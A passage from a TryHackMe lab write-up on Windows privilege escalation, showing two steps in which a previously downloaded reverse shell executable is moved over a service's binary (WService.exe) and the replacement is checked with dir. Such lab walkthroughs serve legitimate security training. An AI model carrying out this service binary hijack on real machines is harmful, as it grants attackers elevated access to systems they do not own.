JonmarCorpuz/Writeups/TryHackMe Module Task Writeups/(Unfinished) Windows Privilege Escalation.md

                3 Dir(s)  14,779,236,352 bytes free
 ```

+10. `move <PAYLOAD> <BINARY_PATH_NAME TARGET EXECUTABLE>` from the compromised Windows machine to move our previously downloaded reverse shell payload executable into our current working directory to replace the previous `BINARY_PATH_NAME` executable with our payload
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>move C:\Users\thm-unpriv\ReverseShell.exe WService.exe
         1 file(s) moved.
 ```

+11. `dir` from the compromised Windows machine to list the files and directories that are in our current working directory to ensure that our payload was successfully transfered and renamed to match the `BINARY_PATH_NAME`'s executable, which it did
 ```PowerShell
 C:\PROGRA~2\SYSTEM~1>dir
  Volume in drive C has no label.